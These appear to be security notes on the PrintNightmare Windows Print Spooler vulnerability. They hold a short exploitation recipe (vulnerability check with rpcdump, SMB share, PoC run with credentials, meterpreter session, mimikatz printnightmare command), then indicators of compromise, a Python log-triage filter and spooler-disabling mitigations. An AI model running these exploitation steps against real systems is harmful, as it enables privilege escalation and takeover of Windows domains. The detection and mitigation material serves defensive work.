Print Nightmare

- Privilege escalation using the Print Spooler service
- Located at `C:\Windows\System32\spoolsv.exe`
- Enabled by default
- CVE-2021-1675 (locally exploitable) and CVE-2021-34527 (RCE) are both related to the print spooler
- The RCE connection is made over DCE/RPC, using `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`
Usage

- Prepare a reverse shell
- Check whether the target is vulnerable (the `|` alternation needs extended regex, so `-E` rather than `-e`):
  `rpcdump.py @$TARGET_IP | grep -E 'MS-RPRN|MS-PAR'`
- Start the SMB server:
  `smbserver.py share . -smb2support`
- Execute the PoC with credentials to elevate:
  `python CVE-2021-1675.py <domain of domain controller>/<user>:<password>@$TARGET_IP`
- Use the meterpreter session
Mimikatz

- PrintNightmare module of mimikatz:
  `misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll`
IOCs

- `RpcAddPrinterDriverEx()` is called
- Sygnia explains them
- Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
- Event IDs 316, 808, 811, 31017, 7031
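The IOCs above turned into a small triage filter. This is an added Python example, not code from these notes or from Sygnia. The event records are constructed in the shape of a SIEM export, and the heuristic that rates a 316 event higher when its driver file list points at a UNC share is an assumption of the example (it mirrors the remote `/library:` delivery in the notes) rather than something the notes state.

```python
import re

# Channels named in the notes above.
PRINTSERVICE_CHANNELS = {
    "Microsoft-Windows-PrintService/Admin",
    "Microsoft-Windows-PrintService/Operational",
}
# PrintService event IDs from the notes. 7031 is raised by the Service
# Control Manager in the System log when a service terminates unexpectedly,
# so it is handled separately and only counted when it concerns the spooler.
PRINTSERVICE_EVENT_IDS = {316, 808, 811, 31017}
SERVICE_CRASH_EVENT_ID = 7031

# Assumption of this example: a driver file list that references a UNC path
# (\\host\share\...) is the strongest indicator, because the driver DLL is
# delivered from a remote share in the technique described above.
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\[^\s,]+")

# Constructed sample records in the shape of a SIEM export; not real telemetry.
SAMPLE_EVENTS = [
    {"channel": "Microsoft-Windows-PrintService/Operational", "event_id": 307,
     "message": "Document 12 owned by alice was printed on HR-Printer."},
    {"channel": "Microsoft-Windows-PrintService/Operational", "event_id": 316,
     "message": "Printer driver Generic Driver for Windows x64 Version-3 was added "
                "or updated. Files:- \\\\files.example.local\\share\\loader.dll, UNIDRV.DLL"},
    {"channel": "Microsoft-Windows-PrintService/Admin", "event_id": 808,
     "message": "The print spooler failed to load a plug-in module "
                "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\old\\1\\loader.dll."},
    {"channel": "System", "event_id": 7031,
     "message": "The Print Spooler service terminated unexpectedly."},
    {"channel": "System", "event_id": 7031,
     "message": "The Windows Update service terminated unexpectedly."},
]


def driver_from_remote_share(message: str) -> bool:
    """True if the message references a file on a UNC share."""
    return UNC_PATH.search(message) is not None


def classify(event: dict):
    """Return (severity, reason) for a suspicious event, or None."""
    channel, event_id, message = event["channel"], event["event_id"], event["message"]

    if channel in PRINTSERVICE_CHANNELS and event_id in PRINTSERVICE_EVENT_IDS:
        if event_id == 316 and driver_from_remote_share(message):
            return ("high", "printer driver added from a remote share")
        return ("medium", f"PrintService event {event_id}")

    # Spooler crashes are worth a look on their own: a failed driver load
    # takes spoolsv.exe down, which shows up as 7031 in the System log.
    if (channel == "System" and event_id == SERVICE_CRASH_EVENT_ID
            and "Print Spooler" in message):
        return ("medium", "Print Spooler service terminated unexpectedly")

    return None


def find_suspicious(events):
    """Filter a list of event records down to the ones worth triaging."""
    hits = []
    for event in events:
        verdict = classify(event)
        if verdict is not None:
            severity, reason = verdict
            hits.append({"event_id": event["event_id"], "severity": severity,
                         "reason": reason, "message": event["message"]})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_EVENTS):
        print(f"[{hit['severity']:6}] {hit['event_id']:>5}  {hit['reason']}")
```

On the sample data this flags the 316 driver install (high, remote share), the 808 plug-in load failure and the spooler's 7031 crash, while leaving the ordinary print job and the unrelated service crash alone. Against a real export, feed it the same three fields from each record.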
Mitigation

- link
- Stop and disable the service:
  `Stop-Service -Name Spooler -Force`
  `Set-Service -Name Spooler -StartupType Disabled`
- Disable via group policy: Computer Configuration/Administrative Templates/Printers